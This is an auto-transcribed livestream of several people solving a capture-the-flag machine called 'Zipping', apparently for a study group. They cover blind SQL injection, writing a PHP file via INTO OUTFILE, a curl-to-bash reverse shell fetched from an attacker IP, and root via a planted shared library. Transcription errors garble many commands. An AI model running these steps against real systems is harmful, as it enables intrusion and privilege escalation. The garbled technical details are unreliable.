You don't want a variable name. You want a variable value.
Value. Yeah, value.
I don't know what the column name is. Double check.
Variable value. Right. So you are totally true. So variable value from information schema global variables where variable name is data there. So we will get, if all is correct, the path into which our beautiful MySQL is able to write files because it's a database is there. So let's see what happens. It starts out great. Far, nice. We know it's far. Come on, far.
You also know that MySQL does weird things with cap insensitivity, given that the capital letters hit first. So the comparison is not on the letter, it's actually, or on the ASCII code, it's actually on a lowercase or uppercase or whatever. It doesn't compare ASCII codes.
Yeah. In this case, farlib MySQL. So it's a very unsurprising, but it actually works. Farlib MySQL is actually the URL or the directory onto which we can do stuff. So awesome. But how do we write stuff into this? Well, I already said there's a select into file, into out file. Select into out file. This will writes the resulting rows to a file and allows the use of column and row terminators to specify a particular output format. Generally, this is used to have a query, get a result, and put that result in a character separated value file. But obviously, we can do other things with this.
Like fixed values, you can select a fixed value, which is returned as a result.
Yeah, if we see if we can do it here. Select. I need to do something. Bugger was here. Into out file. I don't know where I have write access. Temp. Aryan.txt. Something like that. And if we now go to cut temp Aryan.txt, we get the message. Bugger was here. So, given that
we just get a question. We had an LFI, right? Yep, we did. With a PHP extension.
With a PHP extension. So, Kleine Eiden says TMP. Well, for me, it did not work. But when we have access to the box, let's explore that TMP directory. So we can do this. This is awesome. Very nice to have in your notes or in your tutorial on software security. But we can do stuff with this. We can start reverse shells and do everything. I chose to be somewhat lazy and not rely fully on PHP. So I created a refshells file or a shell script. Let's call it that. Shells.com. And again, there's like a million, gazillion, thousand ways to do this, right? This is personal preference, and whatever rocks your boat, you should give that a try. I want bash. Bash. Where's bash? Here's bash. So I'll take a default shell thingy. For the ones who do not know, this is the most awesome reverse shell generator, but it is mandatory to put it in meme mode.
Agreed.
This is mandatory.
I don't know why it's not default. I mean, it should be.
It should be. It should be. A true story. Everybody needs I think the dog died, right? There was a thing on the internet. The dog, the Shiba dog thingy, it died. So
CTFL would do a PHP info into out file. PHP info within MySQL.
Yeah, why not? Because then if you pull out, we'll do that first. We'll do that first. So
it's a nice version.
So we would do something like this. PHP info.
Does that work?
Something like that.
Is it not PHP question open less than question mark PHP and then PHP info?
How much PHP have you written?
As little as possible in my life.
All right.
There are a few things I avoid. Python was on the list. I've been changing that. PHP is still on the I will never write this list. I mean, there was a reason I started with Java in the late 90s instead of with PHP and all those other stuff.
Farlib MySQL, and I created the file cramp. So this would be the SQL statement that we want to send in order to evoke this thing. So how do we call this? Well, we already have a injection point. We don't need to wait for it. We can just try and retrieve the file through our browser or through burp. But we already know this, and there's the select here. So we'll do this.
You want a hash +1.
Yeah. I want to change this part. There we go. This looks horrible, but never fear. I am here. So we do
Control
this.
U.
Control U. Always learn that part. I remove the colon. Let's see. Select. This looks good. Let's give it a try. Probably messed up. This does not wait, but if we are correct, and we go to the browser, we have this product here. We'll give it a bunch of dots to work with.
And now the main question is, does the Apache user have read-writes on Farlib MySQL?
Yes, I didn't even go and test that.
You don't need to add the PHP. It will...
No, true. Very good.
View source.
Oh. Yeah, because I messed up. PHP info. I probably did something wrong with the PHP info thingy. It should probably be PHP thingy right here, right? You
you mean the one where you were questioning me if I knew PHP?
Yeah, I did not. I never said that I knew PHP, and not modern day PHP at least. Maybe PHP info is out. That could be into out file.
Does it overwrite the into out file?
Yeah, exactly. So we will end up with 2 million files. Look at this. Look at this. Remove the view source. There we go, ladies and gentlemen. PHP info. Thank you, CTFL, for the good suggestion. So we have access to a beautiful thing. Now we can do really a plethora of things, right? But one surefire thing that I know is the following beautiful PHP thing, which is system.
Yep.
Curl HTTP 10.10 14.106 port 8000 shell.sh and pipe it through bash and get out of PHP land. That's basically it, right?
Can't you just use push your bash reverse shell into the curl, because you also want to get out of reverse shell land as soon as possible, because that's a disaster. So you want to upgrade to an SSH or whatever as soon as possible. So you could skip the curl bash script and just put a one-liner in the system.
True. And this is all personal preference.
Yes.
But I wanted to do this one, and then I'll go here and off screen go into my reverse shell interactive shell one-liner that Chris created last time we were all together.
I don't know if the empty colon is actually, the empty string is actually parsed as a column, that beef. It might be I don't know if it results in, or if it actually gives a result. But yeah, the field termination you could do.
Yeah, that's quite interesting. Terminate. That's very interesting indeed. Could
but
also work.
Maybe you should put a space in it. select space. I don't know if this one actually gives a result back.
I think it's an empty string. An empty string is different than an empty set. Yeah, anyway. So I took Chris's one-liner, which I love, by the way. Thank you for
Yes.
that. It is still in the chat. And I created a Python 3 HTTP server in my zipping directory, so my shell scripty can be collected. We sent this out already, and if I did not make any boo-boos, and I make it number 3, I believe, we should see a shell, right? Yeah.
As Rectsu, which actually has bash and not as an Apache user. So you're...
Yeah, this is the beauty of the one-liner by Chris, because it does all the shell thingy, so I can do arrow up and stuff like that. It's most awesome. I've used it many times now already, so thank you very much for that.
Yes.
Can you share that shell one-liner? Yes.
Yep. It's a nice cleanup. I used to use what's it called? Ponecat by
yeah. Ponecat
that
is
also
very
has
cool.
Yeah, that also has cleanup. My first step would now be go to the home directory, see if there's a .ssh and upgrade from reverse shell to a stable SSH.
Yeah, sure. But this shell is very cool already. This is very nice.
It's a good shell, but it can still drop.
Yeah, true. In my experience here, it's been okay. So let's explore the TMP. It did not work because only a root. Everybody could write. So let's do TMP. Then I wonder why this didn't work. Blah.txt. It did work. Maybe PHP has an exclusion on executing from TMP. That's interesting. So if you give it a try, or maybe I will
extended attributes, maybe.
Let's see if all my troubles were for nilch, right? TMP rect. And does not work, but I think this is also due to me having a shell at the moment. So we will circle back to this one. So let's go to home and rectsu. There's a user.txt. User.txt is different for everybody. And now the fun begins. Because we have access to this machine.
First, look at the .ssh or just in case your shell drops.
Yeah, you're so worried about the shell.
You don't want to know how many reverse shells I've had dropped because of weird issues.
We have a beautifully full interactive. But
it's stable, but
I will just do it. SH keygen -I zipping -F, I believe, zipping, generating passwords. Right. Right. Got a
var archive. Oh, nice one, Mr. Haas.
What?
Oh, he solved it in an intended way by abusing zip file with a var archive, which backs a shell.php. It's an interesting one, this one.
Wow, nice.
I like it.
Applause for you.
Yep.
So let's grab this soccer. What do you want? Soccer. Home recto .ssh echo to authorized keys. Nice.
Change mod 600.
Wait. Recht zo. Recht zo. Did I mess up with no? Oh, authorized keys. Oh, maybe it's turned off.
Yeah, no, authorized keys should have the same, or should it be publicly readable because the SSH daemon should be able to read it?
What 644?
644.
Authorized keys. No. All right.
Certificate key authentication is off. Interesting.
Interesting. Huh? So yeah, we're not allowed to make an SSH. Boring. Yeah. So what do we do now? Let's explore this web application. I wonder if somebody tries
it
to
is,
create.
and in terms of what I just said, it should be 600.
Yeah, okay, but it's turned off.
Yeah.
So there's shop till you drop. There should be something about credentials here somewhere as well.
I would. Yep, I see a MySQL password.
Yeah. So we could actually go into the database and explore, but for now it seems to be just a product store. So we could spend some time going through it. We don't have a fully interactive. Maybe it actually works.
I would. And I would.
-SQL -U root -B. The beauty of Crystal Shell. Show databases. Use zipping. Maybe there's some credentials. Show tables.
And if you find credentials like the MySQL password, in this case, it's specifically probably used for MySQL, but password reuse for the user is also normally high.
Yeah, true story. So home rechtsu. We could do something like the past history is not in the question.
No, it's definitely profile maybe, dot profile.
Yeah, we could go and upload linpiece. But what is the one thing that you say to always do first?
Sudo -L.
And after the blind SQL injection, which I really adore, which is quite nice, we get to this.
Yeah, this is also where I stop uploading limpies and I would have a look at user bin stock.
Yeah, seeing that we can do sudo user bin stock, enter the password lumpia, invalid password.
Could you ls it first? I'm actually curious what the flags are.
And as I always say, within reverse engineering, start at the front, so do a file and stuff like that. So we know what we're working with. So we have a 46-bit executable, nothing too fancy, not stripped.
Not stripped, okay, so strings on it first, and 8, I would say. Because else it's going to be disaster when it's not stripped.
Look at this size, 16 kilobytes.
Hence the N8. But yeah, okay. First step, I would always do strings and just go over it quickly. Or use object dump, or I would actually just download it to your own machine and just up jump it.
Yeah, I did not really do this, but the ones that followed my reverse engineering course, they bonjour dans le challenge, the cracking. One thing I always say, if there's a comparison or an error message within strings, the other string that is compared to is generally quite nearby, especially in challenges. So we have entered the password. There's a file in the root directory, stock.csv. There's this non-obvious stock manager with lead speak,
Yes.
which is quite interesting. If we actually take a look at minus just strings, we'll see the same thing, but there is also a Hakaiza in front of it. Totally not what I want, but I actually tried this password first, and then I tried this password, stock manager.
Okay, and that beef asks S-trace comparison for you. The string compare is actually not a kernel call. It's not a sys call. It's a libc call. So you want to L-trace it.
Yes, and this is quite interesting because generally on these machines you will never have dynamic inspection tools like strace, ltrace. So ltrace, not found. strace, it's there.
Oh,
And then I thought,
GDB.
well, that's a big hint. That's a big hint.
Is GDB there? I mean, and did they pre-install PETA?
No.
Or I mean, no. How easy do they want to make it?
There's object dump, maybe. Object dump is here. So
okay.
There's
okay.
This had me going like, okay, obviously they want us to do some dynamic analysis on this machine. So let's first
object dump is static enough.
Yeah. So let's first do that stock manager thing. It works. It's beautiful.
This is a medium box, right?
This is a medium box.
Okay, so we don't have to write overflow here.
We'll see.
Just checking. I mean, if it was hard or insane, it might have been right.
Yeah. Well, I think it's medium. One for the blind SQL injection. If you've never done the blind SQL injection, it is quite difficult, right? Let's not get it. Took me some time to get used to it as well. And second, there is a small bit of reversing or actually binary analysis involved. So we can edit things.
And
I want gold, of course. Quality
Rune,
1.
In the meanwhile, Rune says use object dump to dump the .data section, which is the values like strings that are known at compilation time. But you also want to dump the RO data. That's more commonly used nowadays than the data section segment. You want to use the RO data.
RO data.
And there's all the strings. So the .data you actually hardly see anymore because it's deemed in safe.
Yeah. So we have the stock. Yeah, it depends on what type of challenge you do, right? So again, also with this approach, we would get it. We could do a hex edit as well. Maybe there's XXD on the machine as well. XXD, nice. There's been.
I mean, they really want to go for this. Yeah.
Well, it's obvious, right? There is a lot of hints going to this area. Hey, do something with it. So we can play with it a little bit. And then the thing that struck me most is that strace. So, but this is a sudo user bin stock. So if we want to investigate stock, we would have to do a sudo strace, right? But that will ask us for, I need to do Control-C now, a password for Rexu because you're not allowed to run it. And if you would put strace in front of sudo, you would actually strace sudo.
Yes.
So next thing I tried was this user bin stock. Can I just run it? Manager. Obviously, this will not work. Yeah, because we don't have permission to actually read that root file. So,
but you can strace the start.
I can strace the start, and this is the interesting part because I thought, well, maybe we need to do something with the thing, but let's do an strace of it.
There's going to be a rather. Okay, there's a few things I trigger on right away.
Okay, yeah, let's
go down. XXV stocks. This is your standard setup. Memory map to files. Blah blah blah. Nothing special. Go down. Unless I'm missing something. libc loaded. Memory mapping and protect. Read only. I'm looking at the get random that I'm interested in, and I'm looking at the make def.
Yeah. So we have this get random here, and let's see where's the make def.
Both before and after the new FS of the fstat8. New fstat8. This one and right below as well. And I don't know that Cisco from the top of my head.
Wait for it. Let's add a password to it.
I actually don't
now
know
do you
Cisco.
see something interesting?
Ooh. Yes, that's a.
Let's wait. Let's give the chat a moment to see it.
Okay. Yeah. Then I see why this is medium and not hard or insane.
No.
That
beef libcounter.so. Indeed, this beautiful thing here. I triggered on it because of Rectu. So apparently the application tries to do an open add, so open a shared object at home rectu.config libcounter.so, and then it says no such file or directory. But where do we have write access again?
And what is a shared object?
And what is shared object? Well, it's basically a library that is being loaded to add some functionality. And this is
not
very
everyone is aware of how Linux ELF binaries work. It's a DLL, but then for Linux.
Yeah, DLL, shared object, a library that gets loaded. And apparently it is a library that gets loaded, but is not actually required because the program works. And this
it also
makes
has
it
an exception trap for it because it's a no entry exception, which is caught and ignored.
True. So so let's check out this beautiful directory, homerectu.config, and it's empty. Now, a shared object makes you want to think of compilers. So I thought, wow, they probably did not
include GCC or G++.
So there's GCC on. So from here, obviously the maker of this machine wanted us to do an investigation of the binary on the machine, simply because if you move the binary over to your own machine, you will get shared objects that are not loaded, and that might not be noticed, although I rectu. And so we can create our own library. And in my notes, I have this beautiful thing on shared library exploits. And I
would say I would go C++, and I would, because it's object oriented, and I would go for constructors.
Let's see if we think the same.
Does it have VI? How nice is the maker of this box? And it's counter.c and not counter.so.
Sorry. No, I was all taken aback by the VI comments.
Okay. Maybe it says Emacs.
That would be hilarious. Oh, now it stopped working. Which Emacs? No Emacs. So nano counter.c. So we will create a C program. In my notes, I have this small thing that I always use that I found long time ago. which is the smallest C program that I have found that we can actually use as a shared object that will immediately be executed. Let's see, Jeroen has a setgit system bash. Yeah, that would be a shell that is or a setuid
But you can use the
zero
-e on the
shell.
sudo. You already have uit and git. No, your euit in your egit are 0.
Effective, yeah. Yeah, but this one you would use when you have a binary that you can fake. So you can spoof or ghost it or override it. And then you run it. If the binary gets run as sudo, it will drop you into a shell. So that's quite interesting. I have this thingy. I will put it in the Teams as well. Discord actually. This is my basic thing. I should edit that to have a C. There we go. I apologize, guys. There we go. Save. There we go. Beautifully formatted. And the thing what this does, it says I have a function called inject, and I will give it an attribute called constructor. And this will mean that whenever this code, this library is loaded, it will say that in order to construct the thing that is within this library, it will have to call inject. And so inject gets called and it will execute system.
And for those not familiar with C, this is also a forward reference as well. Yes. The inject is forward reference.
Yeah.
Which is
because it is declared and then it is implemented.
Yes.
So that's quite nice. So I use this thing all the time, or all the time whenever I need it. And this is the important thing about nodes, right? Whenever you have nodes on a machine, take the things that you might be able to reuse at a later stage and put it in its own node and put some comments into it or explanation. It's very useful. I think Bodo also has this entire spider web of nodes. Most people have, so very useful. So if we save this buffer, now all we need to do is compile it.
I actually didn't know this one worked with C. That's why I would have switched to C++, because I know how to write CTORs in C++.
Oh yeah, we could give it a try.
No. This is I like this one. This is awesome. But,
counter.
Okay, it's a shared library with position-independent code because it's 64 bits. It's actually is enabled by default. It has no start files because so you don't have your init that Roen linked. And it's a shared library called counter.so.
Yeah.
Or libcounter.so.
That's no such file or directory. Where did I put it? What?
I don't know. I never used nano.
Nano counter.c. Hello? X. Yes. Enter. LS. Okay. I must have messed up. See, I told you it would be a show full of messing up.
Isn't that a default setting?
Yes, it is the fun setting. Or maybe it gets cleaned up. That could also be.
Good chance.
Yeah. So it gives a warning, implicit declaration of function system, blah, blah, blah.
Who cares?
It's a warning, just like most warnings in life, you can ignore it. So it should be compiled now. And so libcounter.so exists. So if we run sudo user bin stock manager, we get dropped into a beautiful root shell. Look at them here. Root, wc minus c on root.txt. We have full access to the machine. and we are also in a very colorful shell. So, yay!
I say it's a win.
It's a win. It's a win.
Did you?
Yeah.
I mean, you have ops dump. Did you actually dump the text section to see what it does with the SO file?
No. No, we can do that if
I
you
was
would
just
like
curious.
so.
Well, I'm actually curious how it's being loaded. And
NC minus LNVP 1235. We know that this is not necessary, but anyway, because last time we found out that it is a shared socket, I believe, or a what you call it. Got user bin stock NC 10 10 14 106 1235 1235. I think that's it, right?
no, netcat.
Oh
no, netcat.
well,
Make
this
FIFO.
is horrible. User bin stock /tmp stock.php. Yeah, flipping hell. Curl. See, one of my tries earlier was horrible.
It's still open. Wow, interesting. Okay. Stock.php. Interesting.
Stock, and then
greater than stock.
minus s greater than stock.
Or use a minus o.
No, it's all fine. It's all good. It's all good. Yeah, we have include, so we can just move it like that. Sudo apt install Ghidra.
You don't have Ghidra standard installed on all your Kalis?
Sudo apt it. Oh, that's a good thing. No, it's not. This is a new Kali. Oh, no, I have it. I did not say anything.
It's always one of the default things I install.
It was a relatively new Kali. Boxes, zipping live, stock. Ok. Go, okay. Stock. Want to analyze? Yes, please. Thank you. Analyze. Look at the magic. Queen. Main, blah, blah. So we have enter the passwords. There should be a deal open here somewhere.
There's scanf. Check off. Maybe the check out function.
Ah, here it is.
It's an XOR with 22.
So yeah, you can only get this through dynamic
analysis.
Analysis, or you need to do a XOR with 22.
Yeah.
I guess, and then XOR this part here. This will be lib counter. And so it is hidden from static analysis, but it's very viewable by dynamic analysis. So that's very nice. So that was I thought it was a very fun box. Had some very cool things. The SQL injection that you can use. I wonder, as we're done here now, let's close all this. Go away. I wonder if temp rect go do it now, right? I wonder if all my troubles were unnecessary. rect. See, there's something wrong with, or wrong, that it does not work on temp. So that would be.
It's rect 3. Your name is incorrect.
So, no, still not. Still, I will send it again in case it got cleaned up. Rect.php. If I was smart, I would still be on the machine as well. But no, that does not work. So temp was not an option. So you still need to go either guess a path or figure out that there's a data there in a global variables, and then use that to do it.
Or use shared memory, because shared memory is always awesome.
You think def exactly.
Def SHM. I'm curious.
SHM Bada. No.
If you go back
to outer space.
Oh,
I need to. Yeah, wait. You should tell me these type of things, right? Python 3. Let's first
because the page actually hung, so it actually works.
Yeah, that works. Well,
yeah.
Def SHM, but that makes me wonder.
I think extended attributes on or cell.
I wonder. Def becomes temp. Not that type of temp. This type of temp. Then we have. No, temp does not work. But def SHM would be a very good thing.
In general, def SHM is usually preferable over temp.
Yeah.
Def SHM is a shared memory, so it's not persistent across reboots or whatever. It's just a piece of mapped internal memory, not on a drive. So it leaves little trace. It leaves traces, but little.
CTFL has a very interesting question. Hey, could we not just use the SQL blind SQL map for it? So let's. I
would actually be interested to see what SQL map says.
Yeah, see if this one works. Page 2, products, shipping watch store, products, contemporary watch.
Just throw SQL map at it and see what happens.
But SQL map needs a valid request.
True.
So if this is a valid request, does SQL map have a? Oh, that's interesting. Can we pass a payload thing? So put it between here.
Minus wizard. That sounds good.
It's a star.
Okay.
Wizard. Would it be a star? Okay. So put it here. That. This will not work, but now we can do. What was the copy to file?
Just save item.
Yeah, I made a mistake here for earlier.
Or copy to file indeed. Which one was it?
I will try. Rec. Get wrecked. Okay. Get wreck. Very cool. Let's see if I did it wrong. Zipping live. So SQL map.
But you got the rec.
Yeah, it's wrong. It's copy to file.
It's copy to file.
Copy to file. We knew this. Every time we do it wrong. There we go. That's better. So SQL map has a tool in it that allows you to take a request Custom injection marker found in the option minus. Do you want to process it? Yes, please. No. I think yes. Yes.
Yes.
Yes.
Yes.
Zipping. Do you want to follow? No.
No.
Yeah, it works. It works. Look at that. Okay, whatever.
Yeah, sure.
Injection not exploitable with null. Do you want to try with
Yes.
random? Yes, I'll take the defaults. Thank you, please.
Isn't there a batch?
Yeah, it does not like it now.
Not injectable.
Save item was wrong. Yes. CTFL rubs it in. Yeah, it didn't find it. No, no. So maybe if there's a more advanced SQL map foo, you can get it. But I think it's fun to actually write some brute force. I will, for the sake of it, put it in the chat as well. Didn't find it prop with minus 10 scripts. I will grab this one. There you go. And put this in the chat. Pattern. Bam. 1, 2, 3. There you go. Some beautiful, beautiful Python script for you. It's very nice.
Pretty.
Yeah. So, yeah. Do we have anything else that we would like to explore? Try to temp. We did everything with the stock thingies. So
Yeah,
I think we can call this clean, nicely owned.
Yep. Looked at binaries. Did blind SQL injections. Yeah. I think we can call this a win.
Yeah, we can call it. It was a very nice little. I thought it was well.
I like it.
Well designed. Interesting thing is that initially there was a upload possibility with a null byte due to the zip version that was being used. They patched that.
Yeah, and Haas already went with the far route, which I found really interesting.
That was very cool. That was very cool. So it was nicely shared. So that was awesome. Let's see. Chris is sharing something about upload server. Let's see. Installed upload.
I didn't know that one. Also looks interesting.
Oh, that is very cool. So you can let's give this a try. Python. Let's add my screen again.
So it's
minenv venv.venv. Right. Let's create a virtual environment so we don't clutter our machine. Venv bin activate. There we go. So he says pip upload server. Install. Okay,
and then Python min upload server, I guess, or what do we have? Yeah, Python min upload server. Okay.
Address already in use.
Okay, space other port.
Space 1, 2, 3, 6.
7.
No. Close. And then if we go here. See if
and then you need to do a HTTP put or a HTTP post of. And what does it need to be, matches. Or can we?
So I would guess it would be something like boxes zipping live curl -x post.
Yeah.
Something. How do I upload a file with curl?
-d.
Just -d?
Man curl. They know. We don't live with man files at all. But
curl upload file.
ChatGPT 4. I mean, I'm paying for this shit. I should use this. How do I upload a file using
Just
HTTP post?
leave it to yeah, right, here we go.
But
Minus S. We already have the answer. We have Chris GPT. Minus F.
Minus F. Okay. Yep.
Zip file. So the name of the file to upload. So if we look at
Do you know why do you have the field submit is equals upload? It's just scroll minus X space post minus F.
Yeah, now you're just jealous that he has the answer before you do. Huh?
Yes. I do.
Where's uploads? Uploads. So if we take a look at the request, it has a zip file, credum zip, and form data submit. So zip file, and that becomes at credmp.zip, right?
And now to the host.
Minus F. Yeah, submit upload.
Is
and
it
then
minus X with a space? It doesn't matter, but
localhost 123.6 / upload.
And a space between minus X and post. I don't know. Is that one fine?
No files found.
You need the field is now called zip file. The field should be files. It's using the wrong field name. So
files.
Done.
Okay, and then what?
And then you look at where that thing was started. Dump.
Yeah, I did that in the same directory. Of course, it uploaded it indeed. So there's a new file here. Minus one, which is 1458. So that's now obviously. So yay, we
Minus
learned
F
something.
files.
That is cool.
Cool. It is nice.
This is very nice. This is very nice.
I like that upload server. It saves a lot of time.
Oh. Well, my just copying it over is with the
I mean,
was normal.
That also works. But, there's a lot of versions and SCP if you have an SSH, etc. But this one is nice. It's quick.
Yeah. Let's call this a win and say it's 9 o'clock. We did the machine. Bam! And it's beautiful.
Indeed.
It was a good machine. I thought it was fun, right?
It is nice. Yeah, I hadn't done it yet. It looks nice. I like the paths that they use.
Time to get some points, man. Time to get some points.
Yeah, don't get me started.
Anyway, thank you for watching. We'll hop back to Discord. Just as a reminder, this is an active machine, so this video will go into hidden mode. So yeah, it's until it is no longer active. So see you on the Discord side. And if you're just watching it and you go like, I'm not going to go into Discord anymore, I'll see you next month in our November meetup. Bye-bye.
Also online.
Also online, indeed. Say bye, Bye, Bye.
Bye, Bye. Hey, bye.
Bye.